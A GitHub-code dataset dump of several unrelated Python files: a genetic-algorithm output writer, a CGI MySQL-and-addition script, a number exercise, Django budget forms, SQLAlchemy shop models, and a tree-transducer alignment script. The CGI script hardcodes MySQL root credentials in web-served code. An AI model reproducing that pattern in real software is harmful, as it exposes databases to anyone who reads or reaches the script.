continuing\"\"\")\n return\n print(\"Waiting 15 seconds. Total time (mins):\", str(total_time/60))\n time.sleep(15)\n total_time += 15\n\n def enforce_fuel_count(self):\n for individual in self.individuals:\n fuel_count = individual.count_material(1)\n if fuel_count != self.options['enforced_fuel_count_value']:\n individual.fix_material_count(1, self.options['enforced_fuel_count_value'])\n\n def write_output(self):\n output_file = open(self.options['output_filename'] + '.csv', 'a')\n\n ###Building string to write\n number_of_children_needed = self.options['number_of_individuals'] - self.options['number_of_parents']\n number_of_inds_from_current_generation = 0\n for ind_count, individual in enumerate(self.individuals):\n if ind_count <= self.options['number_of_parents'] - 1:\n write_string = self.write_options_funct(output_file, individual)\n output_file.write(write_string + \"\\n\")\n if individual.generation == self.generation:\n number_of_inds_from_current_generation += 1\n\n continue\n if individual.generation == self.generation:\n write_string = self.write_options_funct(output_file, individual)\n output_file.write(write_string + \"\\n\")\n if individual.generation == self.generation:\n number_of_inds_from_current_generation += 1\n continue\n\n if ind_count < self.options['number_of_individuals'] - 1:\n if number_of_children_needed > number_of_inds_from_current_generation:\n continue\n write_string = self.write_options_funct(output_file, individual)\n output_file.write(write_string + \"\\n\")\n continue\n output_file.close()\n\n def write_output_v2(self, list_of_individuals, output_file_name = \"\"):\n\n ### Setting the default value, for the by-generation output\n if output_file_name == \"\":\n output_file_name = self.options['output_filename'] + '.csv'\n\n if output_file_name.endswith('.csv') != True:\n output_file_name += \".csv\"\n\n\n output_file = open(output_file_name, 'a')\n\n ###Building string to write\n for ind_count, individual in enumerate(list_of_individuals):\n #print(ind_count, individual.input_file_string)\n write_string = self.write_options_funct(output_file, individual)\n # print(\"writing out child:\", self.generation, ind_count, write_string)\n output_file.write(write_string + \"\\n\")\n\n output_file.close()\n\n def write_options_funct(self, output_file, individual):\n write_string = \"\"\n for write_option in self.options['output_writeout_values']:\n if \"#\" in write_option:\n write_option_split = write_option.split(\"#\")\n write_option = write_option_split[0]\n if write_option == 'generation':\n write_string += str(self.generation) + \",\"\n if write_option == 'individual_count':\n write_string += str(individual.ind_count) + \",\"\n if write_option == 'keff':\n write_string += str(individual.keff) + \",\"\n if write_option == 'front_rank':\n try:\n write_string += str(individual.front_rank) + \",\"\n except:\n write_string += \"N/A,\"\n if write_option == 'crowding_distance':\n try:\n write_string += str(individual.crowding_distance) + \",\"\n except:\n write_string += \"N/A,\"\n if write_option == 'total_flux':\n try:\n write_string += str(individual.total_flux) + \",\"\n except:\n write_string += \"N/A,\"\n if write_option == 'representativity':\n try:\n write_string += str(individual.representativity) + \",\"\n except:\n write_string += \"N/A,\"\n if write_option == 'materials':\n write_string += str(individual.make_material_string_csv())\n if write_option == 'input_name':\n try:\n write_string += str(individual.input_file_string) + ','\n except:\n write_string += \"N/A,\"\n if write_option == 'number_of_fuel':\n write_string += str(individual.count_material(1)) + ','\n if write_option == 'write_out_parents':\n write_string += str(individual.parent_string) + ','\n if write_option == 'write_out_average_diversity_score':\n if self.options['choose_parent_based_on_bitwise_diversity'] == True:\n try:\n average_tds = individual.total_diversity_score / (self.options['number_of_parents'] - 1)\n write_string += str(average_tds) + ','\n except:\n write_string += \"N/A,\"\n else:\n write_string += \"N/A,\"\n return write_string\n\n def create_header(self):\n header_string = \"\"\n for val in self.options['output_writeout_values']:\n if \"#\" in val:\n val_split = val.split(\"#\")\n val = val_split[0]\n val_range = int(val_split[1])\n for _ in range(val_range):\n header_string += val + str(_)+ \",\"\n else:\n header_string += val + \",\"\n\n return header_string\n","repo_name":"jpevey/FNS_GA_v3","sub_path":"Genetic_Algorithm.py","file_name":"Genetic_Algorithm.py","file_ext":"py","file_size_in_byte":42426,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"74599689851","text":"#!/usr/bin/env python3\n\n###########################################################################\nprint('Content-Type:text/html') #HTML is following\nprint(\"\") #Leave a blank line\n\n###########################################################################\n\nimport mysql.connector\nfrom mysql.connector import Error\n\nconn = None\ntry:\n conn = mysql.connector.connect(host='localhost',\n database='python_mysql',\n user='root',\n password='Admin')\n if conn.is_connected():\n print('<p>Connected to MySQL database</p>')\n######## \n try:\n cursor = conn.cursor()\n cursor.execute(\"SELECT * FROM books\")\n row = cursor.fetchone()\n while row is not None:\n print('<p>',row,'</p>')\n row = cursor.fetchone()\n except Error as e:\n print('<p>',e,'</p>')\n finally:\n cursor.close()\n print('<p>Cursor closed</p>')\n######## \n else:\n print('<p>Unable to connect to MySQL database</p>')\n\nexcept Error as e:\n print('<p>',e,'</p>')\n\nfinally:\n if conn is not None and conn.is_connected():\n conn.close()\n print('<p>Connection closed</p>')\n\n###########################################################################\n\nimport cgi\nimport cgitb\ncgitb.enable()\n\ninput_data=cgi.FieldStorage()\n\nprint('<h1>Addition Results</h1>')\ntry:\n num1=int(input_data[\"num1\"].value)\n num2=int(input_data[\"num2\"].value)\nexcept:\n print('<p>Sorry, we cannot turn your inputs into numbers (integers).</p>')\n# return(1)\nsum=num1+num2\nprint('<p>{0} + {1} = {2}</p>'.format(num1,num2,sum))\n\n","repo_name":"jiatinglu99/travboard","sub_path":"temp/add.py","file_name":"add.py","file_ext":"py","file_size_in_byte":1755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"28481676251","text":"A,B=map(eval,input().split(' '))\nl=[]\nfor i in range(A,B+1):\n l.append(str(i))\nn=len(l)\nm=0\nwhile m<n:\n if n-m<5:\n print(' '+' '.join(l[m:]))\n else:\n str=(' '.join(l[m:m+5]))\n print(' '+str)\n m+=5\nsum=0\nfor j in l:\n sum+=eval(j)\nprint('sum={}'.format(sum))","repo_name":"gschen/where2go-python-test","sub_path":"1906101103王自强/15周练习/11.py","file_name":"11.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"2170315636","text":"from django import forms\nfrom django.forms import ModelForm\nfrom app.models import *\n\nclass LoginForm(forms.Form):\n\tusuario =forms.CharField(widget=forms.TextInput())\n\tpassword=forms.CharField(widget=forms.PasswordInput(render_value=False))\n\nclass RubroForm(ModelForm):\n\tname = forms.CharField(label=\"Nombre\", widget=forms.TextInput(attrs={'class':'form-control',\n\t\t\t 'placeholder':'Nombre del rubro'}))\n\tdescription = forms.CharField(label=\"Descripcion\", widget=forms.TextInput(attrs={'class':'form-control',\n\t\t\t 'placeholder':'Descripcion del rubro'}))\n\tbudgeted_amount = forms.CharField(label=\"Monto presupuestado\", widget=forms.TextInput(attrs={'class':'form-control',\n\t\t\t 'placeholder':'Monto presupuestado del rubro'}))\n\treal_amount = forms.CharField(label=\"Monto real\", widget=forms.TextInput(attrs={'class':'form-control',\n\t\t\t 'placeholder':'Monto real del rubro'}))\n\tstatus = forms.CharField(label=\"Estado\", widget=forms.TextInput(attrs={'class':'form-control',\n\t\t\t 'placeholder':'Estad del rubro ej: Activo o Inactivo'}))\n\tarea = forms.ModelChoiceField(label=\"Area\", queryset=Area.objects.all(), widget=forms.Select(attrs={'class':'form-control'}))\n\n\tclass Meta:\n\t\tmodel=Rubro\n\t\texclude=[]\n\nclass AreaForm(ModelForm):\n\tname = forms.CharField(label=\"Nombre\", widget=forms.TextInput(attrs={'class':'form-control',\n\t\t\t 'placeholder':'Nombre la descripcion'}))\n\tdescription = forms.CharField(label=\"Descripcion\", widget=forms.TextInput(attrs={'class':'form-control',\n\t\t\t 'placeholder':'Descripcion del area'}))\n\tstatus = forms.CharField(label=\"Estado\", widget=forms.TextInput(attrs={'class':'form-control',\n\t\t\t 'placeholder':'Estado del area ej: Activo o Inactivo'}))\n\n\tclass Meta:\n\t\tmodel=Area\n\t\texclude=[]\n\nclass BudgetForm(ModelForm):\n\tname = forms.CharField(label=\"Nombre\", widget=forms.TextInput(attrs={'class':'form-control',\n\t\t\t 'placeholder':'Nombre la presupuesto'}))\n\tdescription = forms.CharField(label=\"Descripcion\", widget=forms.TextInput(attrs={'class':'form-control',\n\t\t\t 'placeholder':'Descripcion del presupuesto'}))\n\tstatus = forms.CharField(label=\"Estado\", widget=forms.TextInput(attrs={'class':'form-control',\n\t\t\t 'placeholder':'Estado del presupuesto ej: Activo o Inactivo'}))\n\trubro = forms.ModelChoiceField(label=\"Rubro\", queryset=Rubro.objects.all(), widget=forms.Select(attrs={'class':'form-control'}))\n\n\tclass Meta:\n\t\tmodel=Budget\n\t\texclude=[]\n\nclass ParameterForm(ModelForm):\n\tattribute = forms.CharField(label=\"Atributo\", widget=forms.TextInput(attrs={'class':'form-control',\n\t\t\t 'placeholder':'Atributo del parametro'}))\n\tdescription = forms.CharField(label=\"Descripcion\", widget=forms.TextInput(attrs={'class':'form-control',\n\t\t\t 'placeholder':'Descripcion del parametro'}))\n\tstatus_parameter = forms.CharField(label=\"Estado\", widget=forms.TextInput(attrs={'class':'form-control',\n\t\t\t 'placeholder':'Estado del parametri ej: A o I'}))\n\n\tclass Meta:\n\t\tmodel=Parameter\n\t\texclude=[]\n\nclass ValueParameterForm(ModelForm):\n\tvalue = forms.CharField(label=\"Valor\", widget=forms.TextInput(attrs={'class':'form-control',\n\t\t\t 'placeholder':'Valor del parametro'}))\n\tparameter = forms.ModelChoiceField(label=\"Parametro\", queryset=Parameter.objects.all(), widget=forms.Select(attrs={'class':'form-control'}))\n\torder = forms.CharField(label=\"Orden\", widget=forms.TextInput(attrs={'class':'form-control',\n\t\t\t 'placeholder':'Orden del valor parametro'}))\n\tstatus_value_parameter = forms.CharField(label=\"Estado\", widget=forms.TextInput(attrs={'class':'form-control',\n\t\t\t 'placeholder':'Estado del valor parametro ej: A o I'}))\n\n\tclass Meta:\n\t\tmodel=ValueParameter\n\t\texclude=[]\n","repo_name":"mperezlamadrid/presupuestapp","sub_path":"app/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":3598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"16034357608","text":"from sqlalchemy import Integer, String, Column, Float, ForeignKey\n\nfrom database import Base\n\n\nclass Product_DB(Base):\n __tablename__ = \"products\"\n id = Column(Integer, primary_key=True, autoincrement=True)\n name = Column(String, nullable=False, unique=True)\n price = Column(Float, nullable=False)\n\nclass Cart_DB(Base):\n __tablename__ = \"cart\"\n id = Column(Integer, primary_key=True, autoincrement=True)\n product_id = Column(Integer, ForeignKey(\"products.id\"), unique=True)\n amount = Column(Integer, nullable=False)\n total_price = Column(Float, nullable=False)\n","repo_name":"DrLoon/ElectronicShop","sub_path":"src/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"16682257625","text":"#!/usr/bin/python\nfrom __future__ import print_function\n\nfrom collections import defaultdict\nimport logging\nfrom multiprocessing import Pool, Lock\nimport sys, os, argparse, traceback\nimport simplejson\nimport time\n\nfrom alignment.printing import (PrintDefaultAlignment, PrintGeneralInfo,\n PrintSentencePairInfo, PrintRule)\nfrom extraction.extractor_beam import GetAlignmentFromDerivation\nfrom extraction.feat_instantiator import FeatureInstantiator\nfrom training.transducer import xT\nfrom training.wrtg import SourceProjectionFromDerivationStrict\nfrom utils.tools_generic_transducer import LoadCorpus\nfrom utils.tree_tools import IsString, tree_or_string\n\nlock = Lock()\nRuleExtractor = None\noptions = None\n\nclass ExtractorParser:\n\n def __init__(self, option):\n self.__input\t\t= option.input\n self.__cores\t\t= option.cores\n self.__initial_state\t= option.initial_state\n # Control search space and model expressivity.\n self.__kMaxSrcDepth\t\t= option.kMaxSrcDepth\n self.__kMaxSrcBranches\t= option.kMaxSrcBranches\n self.__kDefaultRunTime\t= option.kDefaultRunTime\n self.__kBeamSize = option.kBeamSize\n self.__phrase_length = option.phrase_length\n self.__n_best\t\t= option.n_best\n self.__dictDir\t\t= option.dictDir\n self.__src_empty\t\t= option.src_empty\n self.__deletions = option.deletions\n # Control feature extraction for discriminative training.\n self.__feat_inst = option.feat_inst\n # Individual features.\n self.__lscsse\t\t= option.lscsse\n self.__lscls\t\t= option.lscls\n self.__lscnd\t\t= option.lscnd\n self.__lscind\t\t= option.lscind\n self.__lsctc\t\t= option.lsctc\n self.__lslex\t\t= option.lslex\n self.__lsnsqa\t\t= option.lsnsqa\n self.__lsapprox\t\t= option.lsapprox\n self.__lsdict = option.lsdict\n self.__lsdictp = option.lsdictp\n ## Entity, predicate and bridging using dictionaries.\n self.__lsdictent\t\t= option.lsdictent\n self.__lsdictbent\t\t= option.lsdictbent\n self.__lsdictpred\t\t= option.lsdictpred\n self.__lsfuzzypred\t\t= option.lsfuzzypred\n self.__lssempred\t\t= option.lssempred\n self.__lssempredfuzzy\t= option.lssempredfuzzy\n ## Entity, predicate and bridging using Solr index.\n self.__lsent\t\t= option.lsent\n self.__lsbent\t\t= option.lsbent\n self.__lspred\t\t= option.lspred\n self.__lsvari\t\t= option.lsvari\n self.__lsenti\t\t= option.lsenti\n self.__lswildrecog\t\t= option.lswildrecog\n # General features.\n self.__lsnp\t\t = option.lsnp\n self.__lsvar\t\t= option.lsvar\n self.__lsentdiff\t\t= option.lsentdiff\n self.__lscomp\t\t= option.lscomp\n self.__lssize\t\t= option.lssize\n self.__lscount\t\t= option.lscount\n self.__lspdc\t\t= option.lspdc\n self.__lspnsp\t\t= option.lspnsp\n self.__lsphdwc\t\t= option.lsphdwc\n self.__lsphpc\t\t= option.lsphpc\n self.__lsphpca\t\t= option.lsphpca\n self.__lsrules\t\t= option.lsrules\n self.__nostrings\t\t= option.nostrings\n self.__lsalign\t\t= option.lsalign\n # Guesser features.\n self.__lsphpcag\t\t= option.lsphpcag\n self.__lsfree\t\t= option.lsfree\n self.__lsurisurf\t\t= option.lsurisurf\n self.__lsbridge\t\t= option.lsbridge\n self.__lsphnsp\t\t= option.lsphnsp\n self.__lsphlsp\t\t= option.lsphlsp\n self.__lsphpcg\t\t= option.lsphpcg\n self.__fmtPrint = option.fmtPrint\n self.__similarity_scorer \t= None\n self.__similarity_score_guesser = None\n\n def run(self):\n\n # Corpus is a list of [src_tree, trg_tree]s.\n corpus = LoadCorpus(self.__input)\n # Adding the sentence number to act as identifier.\n corpus = [(i, src, trg) for i, (src, trg) in enumerate(corpus)]\n\n # Loading features:\n individual_features = []\n general_features = []\n guesser_features = []\n \n if self.__lscsse:\n from linguistics.similarity import SimilarityScorerEnsemble\n\n if self.__lscls:\n from linguistics.similarity_costs import LeafSimilarity\n guesser_features.append(LeafSimilarity(self.__lscls))\n if self.__lscnd:\n from linguistics.similarity_costs import NodesDifference\n general_features.append(NodesDifference(self.__lscnd))\n if self.__lscind:\n from linguistics.similarity_semantics import InnerNodesDifference\n general_features.append(InnerNodesDifference(self.__lscind))\n if self.__lsctc:\n from linguistics.similarity_costs import TreeComplexity\n general_features.append(TreeComplexity(self.__lsctc))\n if self.__nostrings:\n from linguistics.similarity_logics import StringRulesInfiniteCost\n feature_weight, side = self.__nostrings\n general_features.append(\n StringRulesInfiniteCost(float(feature_weight), side))\n if self.__lsalign:\n from linguistics.similarity_align import AlignmentCost\n align_fname, feature_weight = self.__lsalign\n general_features.append(AlignmentCost(align_fname, float(feature_weight)))\n\n if self.__lslex:\n from linguistics.similarity_costs import LexicalSimilarity\n individual_features.append(LexicalSimilarity(self.__lslex))\n if self.__lsvari:\n from linguistics.similarity_semantics import VariableDifferenceIndividual\n individual_features.append(VariableDifferenceIndividual(self.__lsvari))\n if self.__lsenti:\n from linguistics.similarity_semantics import EntityDifferenceIndividual\n individual_features.append(EntityDifferenceIndividual(self.__lsenti))\n if self.__lsvar:\n from linguistics.similarity_semantics import VariableDifference\n general_features.append(VariableDifference(self.__lsvar))\n if self.__lsentdiff:\n from linguistics.similarity_semantics import EntityDifference\n general_features.append(EntityDifference(self.__lsentdiff))\n if self.__lscomp:\n from linguistics.similarity_semantics import TreeDifferenceComplexity\n general_features.append(TreeDifferenceComplexity(self.__lscomp))\n if self.__lssize:\n from linguistics.similarity_semantics import TreeSize\n general_features.append(TreeSize(self.__lssize))\n if self.__lsnp:\n from linguistics.similarity_qa import NounPhraseCost\n feature_weight, cost_np, cost_no_np = map(float, self.__lsnp)\n general_features.append(NounPhraseCost(\n feature_weight=feature_weight, cost_np=cost_np, cost_no_np=cost_no_np))\n if self.__lsrules:\n from linguistics.similarity_rules import DictionaryRules\n dict_filename, feature_weight = self.__lsrules\n individual_features.append(DictionaryRules(dict_filename, float(feature_weight)))\n if self.__lspdc:\n from linguistics.similarity_pre import DictionaryCost\n individual_features.append(DictionaryCost(self.__dictDir, self.__lspdc))\n if self.__lspnsp:\n from linguistics.similarity_pre import NoSimilarityPre\n individual_features.append(NoSimilarityPre(self.__lspnsp))\n if self.__lsnsqa:\n from linguistics.similarity_qa import NoSimilarityQA\n feat_weight, dels_cost, ins_cost, subs_cost = map(float, self.__lsnsqa)\n individual_features.append(\n NoSimilarityQA(feat_weight, dels_cost, ins_cost, subs_cost))\n if self.__lsdict:\n from linguistics.similarity_dictionary import DictionaryCost\n dict_filename, feature_weight = self.__lsdict\n individual_features.append(DictionaryCost(dict_filename, float(feature_weight)))\n\n if self.__lsdictp:\n from linguistics.similarity_dictionary_part import DictionaryCostPart\n dict_filename, feature_weight = self.__lsdictp\n individual_features.append(DictionaryCostPart(dict_filename, float(feature_weight)))\n if self.__lsdictent:\n from linguistics.similarity_dict_entities import DictEntities\n dict_filename, feature_weight = self.__lsdictent\n individual_features.append(DictEntities(dict_filename, float(feature_weight)))\n if self.__lsdictbent:\n from linguistics.similarity_dict_entities import DictBridgeEntities\n dict_filename, feature_weight = self.__lsdictbent\n individual_features.append(DictBridgeEntities(dict_filename, float(feature_weight)))\n if self.__lsdictpred:\n from linguistics.similarity_dict_entities import DictPredicates\n dict_filename, feature_weight = self.__lsdictpred\n dict_predicates = DictPredicates(dict_filename, float(feature_weight))\n individual_features.append(dict_predicates)\n if self.__lsfuzzypred:\n from linguistics.similarity_dict_entities import DictFuzzyPredicates\n dict_filename, feature_weight = self.__lsfuzzypred\n fuzzy_predicates = DictFuzzyPredicates(dict_filename, float(feature_weight))\n individual_features.append(fuzzy_predicates)\n if self.__lssempred:\n from linguistics.similarity_dict_predicates import SemprePredicates\n dict_filename, feature_weight = self.__lssempred\n sempre_predicates = SemprePredicates(dict_filename, float(feature_weight))\n individual_features.append(sempre_predicates)\n if self.__lssempredfuzzy:\n from linguistics.similarity_dict_predicates import SemprePredicatesFuzzy\n dict_filename, feature_weight = self.__lssempredfuzzy\n sempre_predicates_fuzzy = SemprePredicatesFuzzy(dict_filename, float(feature_weight))\n individual_features.append(sempre_predicates_fuzzy)\n\n # Entity/Predicate linking using an inverted index (Solr).\n if self.__lsent or self.__lsbent or self.__lspred or \\\n self.__lscount or self.__lswildrecog:\n from qald.grounding import Linker\n linker = Linker()\n else:\n linker = None\n if self.__lsent:\n from linguistics.similarity_qa import EntityLinkingCost\n feature_weight, kbest = float(self.__lsent[0]), int(self.__lsent[1])\n individual_features.append(\n EntityLinkingCost(feature_weight, kbest, linker=linker))\n if self.__lsbent:\n from linguistics.similarity_qa import BridgeLinkingCost\n feature_weight, kbest = float(self.__lsbent[0]), int(self.__lsbent[1])\n individual_features.append(\n BridgeLinkingCost(feature_weight, kbest, linker))\n if self.__lspred:\n from linguistics.similarity_qa import PredicateLinkingCost\n feature_weight, kbest = float(self.__lspred[0]), int(self.__lspred[1])\n individual_features.append(\n PredicateLinkingCost(feature_weight, kbest, linker))\n # These cost functions also need access to the linker.\n if self.__lscount:\n from linguistics.similarity_qa import CountOp\n general_features.append(CountOp(self.__lscount, linker))\n if self.__lswildrecog:\n from linguistics.similarity_qa import UriSurfCost\n feature_weight = float(self.__lswildrecog)\n individual_features.append(UriSurfCost(feature_weight, linker))\n\n if self.__lsphdwc:\n from linguistics.similarity_phrases import DistributedWordCost, DistributedSimilarity\n distributed_similarity = DistributedSimilarity(self.__dictDir, self.__phrase_length)\n individual_features.append(DistributedWordCost(distributed_similarity, self.__lsphdwc))\n if self.__lsphpc:\n from linguistics.similarity_phrases import PhraseCost, DistributedSimilarity\n distributed_similarity = DistributedSimilarity(self.__dictDir, self.__phrase_length)\n individual_features.append(PhraseCost(distributed_similarity, self.__lsphpc))\n if self.__lsphpca:\n from linguistics.similarity_phrases_ag import DistributedSimilarity\n from linguistics.similarity_phrases_ag import PhraseCost\n feature_weight, src_lang, trg_lang = self.__lsphpca\n distributed_similarity = \\\n DistributedSimilarity(self.__dictDir, self.__phrase_length,\n str(src_lang), str(trg_lang))\n individual_features.append(\n PhraseCost(distributed_similarity, float(feature_weight)))\n if self.__lsapprox:\n from linguistics.similarity_approx import ApproximateMatch\n individual_features.append(ApproximateMatch(self.__lsapprox))\n if self.__lsfree:\n from linguistics.similarity_freebase import EntityLinkingCost\n individual_features.append(EntityLinkingCost(self.__lsfree))\n if self.__lsurisurf:\n from linguistics.similarity_urisurf import URISurfCost\n individual_features.append(URISurfCost(self.__lsurisurf))\n if self.__lsbridge:\n from linguistics.similarity_bridge import BridgeCost\n individual_features.append(BridgeCost(self.__lsbridge))\n if self.__lsphnsp:\n from linguistics.similarity_phrases import NoSimilarityPhrases\n individual_features.append(NoSimilarityPhrases(self.__lsphnsp))\n if self.__lsphlsp:\n from linguistics.similarity_phrases import LeafSimilarityPhrases\n guesser_features.append(LeafSimilarityPhrases(self.__lsphlsp))\n if self.__lsphpcag:\n from linguistics.similarity_phrases_ag import PhraseCostGuesser\n guesser_features.append(PhraseCostGuesser(distributed_similarity, self.__lsphpcag))\n if self.__lsphpcg:\n from linguistics.similarity_phrases import PhraseCostGuesser, DistributedSimilarity\n # We are currently using the same distributd_similarity object\n # as for PhraseCost similarity function. This is to avoid pre-caching\n # the same phrases for the similarity function and the similarity guesser.\n # distributed_similarity = DistributedSimilarity(self.__dictDir)\n guesser_features.append(PhraseCostGuesser(distributed_similarity, self.__lsphpcg))\n\n # Using either exact search (if no beam size is specified), or approximated search.\n global RuleExtractor\n if self.__kBeamSize > 0:\n from extraction.extractor_beam import RuleExtractor as RuleExtractorApprox\n RuleExtractor = RuleExtractorApprox\n else:\n from extraction.extractor_exact import RuleExtractor as RuleExtractorExact\n RuleExtractor = RuleExtractorExact\n\n if self.__feat_inst:\n self.__feat_instantiator = FeatureInstantiator(self.__feat_inst)\n else:\n self.__feat_instantiator = None\n \n command_used = 'python -m alignment.align ' + ' '.join(sys.argv[1:])\n general_info = {'general_info' : {'kMaxSrcDepth' : self.__kMaxSrcDepth,\n 'kMaxSrcBranches' : self.__kMaxSrcBranches,\n 'kDefaultRunTime' : self.__kDefaultRunTime,\n 'kBeamSize' : self.__kBeamSize,\n 'phrase_length' : self.__phrase_length,\n 'initial_state' : self.__initial_state,\n 'command' : command_used}\n }\n general_info_str = PrintGeneralInfo(general_info, self.__fmtPrint)\n print(general_info_str, end='\\n\\n')\n\n if self.__lscsse:\n self.__similarity_scorer = \\\n SimilarityScorerEnsemble(individual_features, general_features)\n self.__similarity_score_guesser = \\\n SimilarityScorerEnsemble(guesser_features)\n else:\n self.__similarity_scorer = individual_features[0]\n self.__similarity_score_guesser = guesser_features[0]\n\n global options\n options = {'similarity_scorer' : self.__similarity_scorer,\n 'similarity_score_guesser' : self.__similarity_score_guesser,\n 'max_source_branches' : self.__kMaxSrcBranches,\n 'max_source_depth' : self.__kMaxSrcDepth,\n 'max_running_time' : self.__kDefaultRunTime,\n 'beam_size' : self.__kBeamSize,\n 'cached_extractors' : {},\n 'initial_state' : self.__initial_state,\n 'src_empty' : self.__src_empty,\n 'deletions' : self.__deletions,\n 'feat_inst' : self.__feat_instantiator,\n 'nbest' : self.__n_best,\n 'fmt' : self.__fmtPrint}\n\n try:\n if self.__cores == 1:\n self.__ObtainTransductionsFromCorpus(corpus)\n else:\n self.__ObtainTransductionsFromCorpusParallel(corpus)\n except KeyboardInterrupt:\n sys.exit(1)\n except Exception as e:\n traceback.print_exc(file=sys.stderr)\n sys.exit(255)\n finally:\n self.__similarity_scorer.Close()\n self.__similarity_score_guesser.Close()\n if self.__feat_instantiator:\n self.__feat_instantiator.Close()\n if linker:\n linker.close()\n\n def __ObtainTransductionsFromCorpusParallel(self, corpus):\n pool = Pool(processes=self.__cores, maxtasksperchild=1)\n pool.map_async(ExtractRulesFromPair, corpus).get(9999999)\n pool.close()\n pool.join()\n return\n \n def __ObtainTransductionsFromCorpus(self, corpus):\n for numbered_tree_pair in corpus:\n ExtractRulesFromPair(numbered_tree_pair)\n return\n\ndef ExtractRulesFromPair(numbered_tree_pair):\n global lock\n\n pair_num, tree_string1, tree_string2 = numbered_tree_pair\n tree1 = tree_or_string(tree_string1)\n tree2 = tree_or_string(tree_string2)\n path1, path2 = (), ()\n rule_extractor = RuleExtractor(tree1, tree2, path1, path2, options)\n\n derivations = \\\n rule_extractor.ObtainBestDerivations(options['nbest'], state_id='')\n time_spent = time.time() - rule_extractor.time_start\n if not derivations:\n derivation_cost = 1000\n alignment_str = PrintDefaultAlignment(tree1, tree2)\n tree_pair_info = {'pair_info' : \\\n {'pair_num' : pair_num,\n 'n_best' : -1,\n 'source' : tree_string1,\n 'target' : tree_string2,\n 'alignment' : alignment_str,\n 'cost' : derivation_cost,\n 'status' : rule_extractor.status,\n 'time' : time_spent}\n }\n else:\n for i, derivation in enumerate(derivations):\n derivation_cost = sum([rule.weight for rule in derivation])\n alignment_str = GetAlignmentFromDerivation(derivation, tree1, tree2)\n tree_pair_info = {'pair_info' : \\\n {'pair_num' : pair_num,\n 'n_best' : i,\n 'source' : tree_string1,\n 'target' : tree_string2,\n 'alignment' : alignment_str,\n 'cost' : derivation_cost,\n 'status' : rule_extractor.status,\n 'time' : time_spent}\n }\n tree_pair_info_str = \\\n PrintSentencePairInfo(tree_pair_info, fmt=options['fmt'])\n lock.acquire()\n print(tree_pair_info_str)\n for rule in derivation:\n print(PrintRule(rule, options['fmt']))\n sys.stdout.flush()\n lock.release()\n return\n\ndef main(args = None):\n\n import textwrap\n usage = \"usage: %prog [options]\"\n parser = argparse.ArgumentParser(usage)\n parser = argparse.ArgumentParser(\n prefix_chars='@',\n formatter_class=argparse.RawDescriptionHelpFormatter, \n description=textwrap.dedent('''\\\n corpus.tt (tree-tree) must contain pairs of trees like:\n ------------------------------------------------------\n NP(DT(a) NN(house))\n NP(DT(the) NN(house))\n NP(DT(a) NN(ball))\n S(NP(EX(There)) VP(VBZ(is) NP(DT(a) NN(ball))))\n ...\n '''))\n\n parser.add_argument('input',\t\t\tnargs='?',\t\ttype=str,\t\t\tdefault=sys.stdin,\tmetavar=\"INPUT\", \\\n\t\t\thelp=\"Input corpus.tt contains parallel source and target constituent trees.\")\n parser.add_argument(\"@@cores\",\t\tdest=\"cores\",\t\tnargs='?',\ttype=int,\tdefault=\"1\", \\\n\t\t help=\"CPUs to use\")\n parser.add_argument(\"@@initial_state\",\tdest=\"initial_state\",\tnargs='?',\ttype=str,\tdefault=\"start\", \\\n\t\t help=\"CPUs to use\")\n parser.add_argument(\"@@kMaxSourceDepth\",\tdest=\"kMaxSrcDepth\",\tnargs='?',\ttype=int,\tdefault=\"2\", \\\n\t\t help=\"\")\n parser.add_argument(\"@@kMaxSourceBranches\",\tdest=\"kMaxSrcBranches\",\tnargs='?',\ttype=int,\tdefault=\"3\", \\\n\t\t help=\"\")\n parser.add_argument(\"@@kDefaultRunTime\",\tdest=\"kDefaultRunTime\",\tnargs='?',\ttype=int,\tdefault=\"100\", \\\n\t\t help=\"Set the running time in second.\")\n parser.add_argument(\"@@kBeamSize\", \tdest=\"kBeamSize\",\tnargs='?',\ttype=int,\tdefault=\"0\", \\\n\t\t help=\"Set the beam size of the approximated search. If not set, exact search is performed.\")\n parser.add_argument(\"@@src_empty\", \tdest=\"src_empty\",\tnargs='?',\ttype=bool,\tdefault=True, \\\n\t\t help=\"Forbids empty (epsilon) transitions on source tree (left-hand-sides of rules). Default is True.\")\n parser.add_argument(\"@@feat_inst\", \tdest=\"feat_inst\",\tnargs='?',\tdefault='', \\\n\t\t help=\"Enables feature instantiation for discriminative training. Default is False.\")\n parser.add_argument(\"@@deletions\", \tdest=\"deletions\",\tnargs='?',\ttype=bool,\tdefault=True, \\\n\t\t help=\"Enables deletion operations. Default is True.\")\n parser.add_argument(\"@@phrase_length\",\tdest=\"phrase_length\",\tnargs='?',\ttype=int,\tdefault=\"1\", \\\n\t\t help=\"Maximum phrase length for similarity function.\")\n parser.add_argument(\"@@n_best\",\tdest=\"n_best\",\tnargs='?',\ttype=int,\tdefault=\"1\", \\\n\t\t help=\"Maximum number of derivations to be extracted.\")\n parser.add_argument(\"@@fmtPrint\",\t\tdest=\"fmtPrint\",\tnargs='?',\ttype=str,\tdefault=\"json\", \\\n\t\t help=\"Set the printing format, yaml or json. Default is json.\")\n parser.add_argument(\"@@dictDir\",\t\tdest=\"dictDir\",\t\tnargs='?',\ttype=str,\tdefault=\"/home/yulin/PHD/source/pascual/transducers/lex.j2e.cost.small\", \\\n\t\t help=\"The directory of the lexicon cost dictionary\")\n parser.add_argument(\"@@LSCSSE\",\t\tdest=\"lscsse\",\t\taction=\"store_true\", \\\n\t\t help=\"from linguistics.similarity import SimilarityScorerEnsemble. Default is False.\")\n parser.add_argument(\"@@LSCLS\",\t\tdest=\"lscls\",\t\taction=\"store_true\", \\\n\t\t help=\"from linguistics.similarity_costs import LeafSimilarity. Default is False.\")\n parser.add_argument(\"@@LSCND\",\t\tdest=\"lscnd\",\t\tnargs='?',\ttype=float, \tdefault=0.0,\n\t\t help=\"from linguistics.similarity_costs import NodesDifference. Default is False.\")\n parser.add_argument(\"@@LSCIND\",\t\tdest=\"lscind\",\t\tnargs='?',\ttype=float, 